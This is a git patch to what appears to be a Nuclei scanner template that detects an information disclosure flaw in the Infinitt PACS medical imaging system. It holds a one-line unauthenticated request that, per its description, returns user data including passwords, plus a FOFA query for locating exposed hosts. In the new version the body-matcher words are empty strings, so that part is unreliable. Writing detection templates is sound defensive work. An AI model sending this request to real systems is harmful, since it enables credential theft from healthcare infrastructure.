From 4713b7def5a4a0f48d2a4fc5e773fa343166b346 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Dec 2024 10:43:34 +0530 Subject: [PATCH] Update infinitt-pacs-info-leak.yaml --- .../infinitt/infinitt-pacs-info-leak.yaml | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml index e1fa139cb12..f94d699233a 100644 --- a/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml +++ b/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml @@ -1,32 +1,31 @@ -id: infinitt-pacs-info-leak +id: infinitt-pacs-info-disclosure info: - name: Infinitt PACS System - Information Leak + name: Infinitt PACS System - Information Disclosure author: adeljck severity: high description: | - Infinitt PACS System is vulnerable to an information leak vulnerability. By sending a crafted request, an attacker can obtain sensitive user information, including passwords. + Infinitt PACS System is vulnerable to an Information Disclosure vulnerability. By sending a crafted request, an attacker can obtain sensitive user information, including passwords. remediation: | Ensure that access to the WebUserLogin.asmx endpoint is restricted and requires authentication. Implement proper access controls and input validation to prevent unauthorized access to sensitive user information. metadata: verified: true max-request: 1 fofa-query: icon_hash="1474455751" || icon_hash="702238928" - tags: infinitt,info-leak + tags: infinitt,disclosure,exposure http: - - raw: - - | - GET /webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin" matchers-condition: and matchers: - type: word part: body words: - - "web_user_login" - - "USER_KEY" + - "" + - "" condition: and - type: word